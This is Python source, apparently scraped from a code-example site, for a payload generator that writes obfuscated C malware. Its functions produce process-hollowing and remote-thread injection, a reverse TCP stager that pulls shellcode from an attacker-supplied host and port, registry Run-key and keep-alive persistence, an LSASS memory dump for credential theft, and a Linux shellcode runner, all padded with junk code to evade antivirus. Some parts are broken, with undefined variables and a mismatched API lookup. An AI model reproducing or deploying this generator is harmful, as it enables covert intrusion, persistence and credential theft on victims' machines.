                Ret_code += RandTcontext + ".Eax = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            else:

                Ret_code += RandTcontext + ".Rcx = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext + ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            Ret_code += "SetThreadContext(" + Randpi + ".hThread,&" + RandTcontext+ ");\n"
            Ret_code += "ResumeThread(" + Randpi + ".hThread);\n"

        Ret_code += "return 1;\n"
        Ret_code += "}}\n"

    elif ModOpt["ExecMethod"] in ["Chimera","C"]:

        Randthread = varname_creator()
        Randhand = varname_creator()
        Randresult = varname_creator()

        if ModOpt["DynImport"] == True:

            NdcCreateRemoteThread = varname_creator()
            NdcWaitForSingleObject = varname_creator()
            
            Ret_code += "DWORD " + Randthread + ";\n"
            Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
            Ret_code += "HANDLE " + Randhand + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint),NULL,0,&"+ Randthread + ");\n"
            Ret_code += "FARPROC " + NdcWaitForSingleObject + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += NdcWaitForSingleObject + "(" + Randhand + ",-1);}}}}\n"

        else:
            Ret_code += "DWORD " + Randthread + ";\n"
            Ret_code += "HANDLE " + Randhand + " = CreateRemoteThread(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint),NULL,0,&"+ Randthread + ");\n"
            Ret_code += "DWORD " + Randresult + " = WaitForSingleObject(" + Randhand + ",-1);}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def RevTcpStager_C_windows(ModOpt):

    Randvarsize = varname_creator()
    Randlpv = varname_creator()
    Randvar = varname_creator()
    Randversion = varname_creator()
    Randwsadata = varname_creator()
    Randtarget = varname_creator()
    Randsock = varname_creator()
    RandSocket = varname_creator()
    Randint = varname_creator()
    Randtret = varname_creator()
    Randnret = varname_creator()
    Randstartb = varname_creator()

    if ModOpt["Arch"] == "x86":

        ModOpt["Bufflen"] = Randvarsize + " + 5"
    else:
        ModOpt["Bufflen"] = Randvarsize + " + 10"

    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    ModOpt["Decoder"] = "False"

    Ret_code = ""
    Ret_code += "#define _WIN32_WINNT 0x0500\n"
    Ret_code += "#include <winsock2.h>\n"

    Include_List = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n", "#include <tlhelp32.h>\n"
    ]

    Ret_code += IncludeShuffler(Include_List)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    if ModOpt["Arch"] == "x86":

        Ret_code += "ULONG32 " + Randvarsize + ";\n"
    else:
        Ret_code += "ULONG64 " + Randvarsize + ";\n"

    Ret_code += "int " + Randvar + ";\n"
    Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);\n"
    Ret_code += "WSADATA " + Randwsadata + ";\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        WS2_32 = varname_creator()
        NdcWSAStartup = varname_creator()
        NdcWSACleanup = varname_creator()
        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n"
        Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n"
        Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n"
        Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += NdcWSACleanup + "();exit(1);}\n"
    else:
        Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += "WSACleanup();exit(1);}\n"

    Ret_code += "struct hostent * " + Randtarget + ";\n"
    Ret_code += "struct sockaddr_in " + Randsock + ";\n"
    Ret_code += "SOCKET " + RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n"
    Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    Ret_code += Randtarget + " = gethostbyname(\"" + ModOpt[
        "Lhost"] + "\");\n"  #Lhost
    Ret_code += "if (" + Randtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + Randtarget + "->h_addr, " + Randtarget + "->h_length);\n"
    Ret_code += Randsock + ".sin_family = AF_INET;\n"
    Ret_code += Randsock + ".sin_port = htons((" + ModOpt[
        "Lport"] + "));\n"  #Lport
    Ret_code += "if (connect(" + RandSocket + ",(struct sockaddr *)&" + Randsock + ",sizeof(" + Randsock + "))){closesocket(" + RandSocket + ");\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcWSACleanup + "();exit(1);}\n"
        Ret_code += "int " + Randint + " = recv(" + RandSocket + ", (char *)&" + Randvarsize + ", 4, 0);\n"
        Ret_code += "if (" + Randint + " != (4) || " + Randvarsize + " <= 0) {closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n"
        Ret_code += "char * " + Randlpv + ";\n"
    else:
        Ret_code += "WSACleanup();exit(1);}\n"
        Ret_code += "int " + Randint + " = recv(" + RandSocket + ", (char *)&" + Randvarsize + ", 4, 0);\n"
        Ret_code += "if (" + Randint + " != (4) || " + Randvarsize + " <= 0) {closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
        Ret_code += "char * " + Randlpv + ";\n"

    Ret_code += inject_utils.Win_MemLocal(ModOpt)

    if ModOpt["Arch"] == "x86":

        Ret_code += Randlpv + "[0] = 0xBF;\n"
        Ret_code += "memcpy(" + Randlpv + " + 1, &" + RandSocket + ",4);\n"
    else:
        Ret_code += Randlpv + "[0] = 0x48;\n"
        Ret_code += Randlpv + "[1] = 0xBF;\n"
        Ret_code += "memcpy(" + Randlpv + " + 2, &" + RandSocket + ",4);\n"

    Ret_code += "int " + Randtret + "=0;int " + Randnret + "=0;\n"

    if ModOpt["Arch"] == "x86":

        Ret_code += "void * " + Randstartb + " = " + Randlpv + " + 5;\n"
    else:
        Ret_code += "void * " + Randstartb + " = " + Randlpv + " + 10;\n"

    Ret_code += "while (" + Randnret + " < " + Randvarsize + "){\n"
    Ret_code += Randtret + " = recv(" + RandSocket + ", (char *)" + Randstartb + ", " + Randvarsize + " - " + Randnret + ", 0);\n"
    Ret_code += Randstartb + " += " + Randtret + ";" + Randnret + " += " + Randtret + ";\n"

    if ModOpt["DynImport"] == True:
        Ret_code += "if (" + Randtret + " == SOCKET_ERROR) {closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}}\n"
    else:
        Ret_code += "if (" + Randtret + " == SOCKET_ERROR) {closesocket(" + RandSocket + ");WSACleanup();exit(1);}}\n"

    Ret_code += Randint + " = " + Randnret + ";\n"

    if "RW/" in MemAlloc and ExecMethod in ["Thread", "APC"]:

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    if ModOpt["ExecMethod"] in ["Thread", "APC"]:

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def Persistence_C_KeepAliveProcess_windows(ModOpt):

    FilePath = ModOpt["Binpath"]
    Procname = ModOpt["ProcTarget"]
    WaitBeforeCheck = ModOpt["Timevar"]
    RandBool = varname_creator()
    RandEntry = varname_creator()
    RandHandle = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n",
        "#include <tlhelp32.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "while (TRUE){\n"
    Ret_code += "BOOL " + RandBool + " = FALSE;\n"
    Ret_code += "PROCESSENTRY32 " + RandEntry + ";\n"
    Ret_code += RandEntry + ".dwSize = sizeof(PROCESSENTRY32);\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    if ModOpt["DynImport"] == True:

        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()
        NdcWinExec = varname_creator()

        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32Next\");\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "FARPROC " + NdcWinExec + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"WinExec\");\n"
        Ret_code += "if (" + RandBool + " == FALSE ){" + NdcWinExec + "(\"" + FilePath + "\",0);}}\n"
    else:

        Ret_code += "HANDLE " + RandHandle + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);\n"
        Ret_code += "if (Process32First(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (Process32Next(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}}\n"
        Ret_code += "CloseHandle(" + RandHandle + ");\n"
        Ret_code += "if (" + RandBool + " == FALSE ){WinExec(\"" + FilePath + "\",0);}}\n"

    Ret_code += "Sleep(" + WaitBeforeCheck + ");}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def Postex_C_DumpLsass_windows(ModOpt):

    Randentry = varname_creator()
    RandhProcess = varname_creator()
    RandProcsnapshot = varname_creator()
    NdcMDWD = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList)
    Ret_code += "#include <tlhelp32.h>\n"
    Ret_code += "#include <dbghelp.h>\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(SpawnMultiProc)

    Ret_code += "$:EVA\n"

    Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
    Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"
    Ret_code += "HANDLE lsassHandle = NULL;\n"
    Ret_code += "HANDLE outFile = CreateFile(\"lsass.dmp\", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\n"

    if ModOpt["DynImport"] == True:

        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()
        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32Next\");\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"lsass.exe\") == 0){\n"
        Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"

    else:
        Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"lsass.exe\") == 0){\n"
        Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"

    Ret_code += "FARPROC " + NdcMDWD + " = GetProcAddress(GetModuleHandle(\"dbghelp.dll\"),\"MiniDumpWriteDump\");\n"
    Ret_code += NdcMDWD + "(" + RandhProcess + "," + Randentry + ".th32ProcessID,outFile,MiniDumpWithFullMemory,NULL,NULL,NULL);}}}\n"
    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(SpawnMultiProc)

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def ShellInject_C_linux(ModOpt):

    Randbufname = varname_creator()

    Payload = ModOpt["Payload"]
    Encryption = ModOpt["Encode"]
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    DecodeKit = EncryptionManager(Encryption, Payload, Randbufname)
    Payload = DecodeKit[0]  # encoded shellcode
    ModOpt["Decoder"] = DecodeKit[
        1]  # decoder stub or string = False if decoder is not necessary

    Randmem = varname_creator()
    Randptr = varname_creator()
    Randinj = varname_creator()

    Ret_code = ""

    Include_List = [
        "#include <stdlib.h>\n", "#include <unistd.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n",
        "#include <sys/mman.h>\n", "#include <math.h>\n",
        "#include <pthread.h>\n"
    ]

    Ret_code += IncludeShuffler(Include_List)

    Ret_code += "int main(int argc,char * argv[]){\n"

    Ret_code += "$:START\n"

    Ret_code += "unsigned char " + Randbufname + "[] = \"" + ModOpt[
        "Payload"] + "\";\n"

    if ModOpt["MemAlloc"] == "Heap_RWX":

        fl = "PROT_READ|PROT_WRITE|PROT_EXEC"
    else:
        fl = "PROT_READ|PROT_WRITE"

    Ret_code += "void * " + Randptr + " = mmap(0,sizeof(" + Randbufname + ")," + fl + ",MAP_PRIVATE|MAP_ANON,-1,0);\n"

    if ModOpt["Decoder"] != "False":

        Ret_code += ModOpt["Decoder"]

    if ModOpt["MemAlloc"] in ["Heap_RW/RX", "Heap_RW/RWX"]:

        if "RWX" in ModOpt["MemAlloc"]:

            fl = "PROT_READ|PROT_WRITE|PROT_EXEC"
        else:
            fl = "PROT_READ|PROT_EXEC"

        Ret_code += "mprotect(" + Randptr + ",sizeof(" + Randbufname + ")," + fl + ");\n"

    Ret_code += "memcpy(" + Randptr + "," + Randbufname + ", sizeof(" + Randbufname + "));\n"

    Ret_code += "pthread_create(0,NULL," + Randptr + ",NULL);\n"

    Ret_code += "$:END\n"

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], 0,
                            ModOpt["JR"])

    Ret_code += "return 0;}"

    WriteSource("Source.c", Ret_code)
Beispiel #10
0
def Persistence_C_REG_windows(ModOpt):

    FilePath = ModOpt["Binpath"]
    FakeAppname = ModOpt["Pname"]
    Elevated = ModOpt["Priv"]

    Randvarpath = varname_creator()
    Randvarpath2 = varname_creator()
    RandHKey = varname_creator()
    RandHKey2 = varname_creator()
    RandLResult = varname_creator()
    RandLResult2 = varname_creator()
    Randhandle = varname_creator()
    RandSZvalue = varname_creator()
    RandFSuccess = varname_creator()
    RandFSuccess2 = varname_creator()
    RandDWsize = varname_creator()
    RandDWsize2 = varname_creator()
    RandCount = varname_creator()
    RandRegtype = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(SpawnMultiProc)

    Ret_code += "$:EVA\n"

    Ret_code += "wchar_t " + Randvarpath + "[260];\n"
    Ret_code += "HMODULE " + Randhandle + " = LoadLibrary(TEXT(\"" + FilePath + "\"));\n"

    if ModOpt["DynImport"] == True:

        NdcGMFNW = varname_creator()
        Ret_code += "FARPROC " + NdcGMFNW + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ", \"GetModuleFileNameW\");\n"
        Ret_code += NdcGMFNW + "(" + Randlpv + "," + Randbufname + "," + ModOpt[
            "Bufflen"] + ");\n"
    else:
        Ret_code += "GetModuleFileNameW(" + Randhandle + ", " + Randvarpath + ", 260);\n"

    Ret_code += "HKEY " + RandHKey + " = NULL;LONG " + RandLResult + " = 0;BOOL " + RandFSuccess + " = TRUE;\n"
    Ret_code += "DWORD " + RandDWsize + ";const size_t " + RandCount + " = 260*2;\n"
    Ret_code += "wchar_t " + RandSZvalue + "[260*2] = {};\n"
    Ret_code += "wcscpy_s(" + RandSZvalue + ", " + RandCount + ", L\"\\\"\");\n"
    Ret_code += "wcscat_s(" + RandSZvalue + ", " + RandCount + ", " + Randvarpath + ");\n"
    Ret_code += "wcscat_s(" + RandSZvalue + ", " + RandCount + ", L\"\\\" \");\n"

    if ModOpt["DynImport"] == True:

        NdcRCEKW = varname_creator()
        Ret_code += "FARPROC " + NdcRCEKW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegCreateKeyExW\");\n"

        if Elevated == True:

            Ret_code += RandLResult + " = " + NdcRCEKW + "(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"
        else:
            Ret_code += RandLResult + " = " + NdcRCEKW + "(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"

    else:
        if Elevated == True:

            Ret_code += RandLResult + " = RegCreateKeyExW(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"
        else:
            Ret_code += RandLResult + " = RegCreateKeyExW(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"

    Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);\n"
    Ret_code += "if (" + RandFSuccess + "){\n"
    Ret_code += RandDWsize + " = (wcslen(" + RandSZvalue + ")+1)*2;\n"

    if ModOpt["DynImport"] == True:
        NdcRSKEW = varname_creator()
        NdcRCK = varname_creator()
        Ret_code += "FARPROC " + NdcRSKEW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegSetValueExW\");\n"
        Ret_code += "FARPROC " + NdcRCK + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegCloseKey\");\n"
        Ret_code += RandLResult + " = " + NdcRSKEW + "(" + RandHKey + ",L\"" + FakeAppname + "\", 0, REG_SZ, (BYTE*)" + RandSZvalue + ", " + RandDWsize + ");"
        Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);}\n"
        Ret_code += "if (" + RandHKey + " != NULL){" + NdcRCK + "(" + RandHKey + ");" + RandHKey + " = NULL;}\n"
    else:

        Ret_code += RandLResult + " = RegSetValueExW(" + RandHKey + ",L\"" + FakeAppname + "\", 0, REG_SZ, (BYTE*)" + RandSZvalue + ", " + RandDWsize + ");"
        Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);}\n"
        Ret_code += "if (" + RandHKey + " != NULL){RegCloseKey(" + RandHKey + ");" + RandHKey + " = NULL;}\n"

    Ret_code += "HKEY " + RandHKey2 + " = NULL;LONG " + RandLResult2 + " = 0;BOOL " + RandFSuccess2 + " = TRUE;DWORD " + RandRegtype + " = REG_SZ;\n"
    Ret_code += "wchar_t " + Randvarpath2 + "[260]  = {};DWORD " + RandDWsize2 + " = sizeof(" + Randvarpath + ");\n"

    if ModOpt["DynImport"] == True:

        NdcOKEW = varname_creator()

        Ret_code += "FARPROC " + NdcOKEW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegOpenKeyExW\");\n"

        if Elevated == True:

            Ret_code += RandLResult2 + " = " + NdcOKEW + "(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"
        else:
            Ret_code += RandLResult2 + " = " + NdcOKEW + "(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"

    else:

        if Elevated == True:

            Ret_code += RandLResult2 + " = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"
        else:
            Ret_code += RandLResult2 + " = RegOpenKeyExW(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(SpawnMultiProc)

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
Beispiel #11
0
def BuildReflectiveLoader(ModOpt):

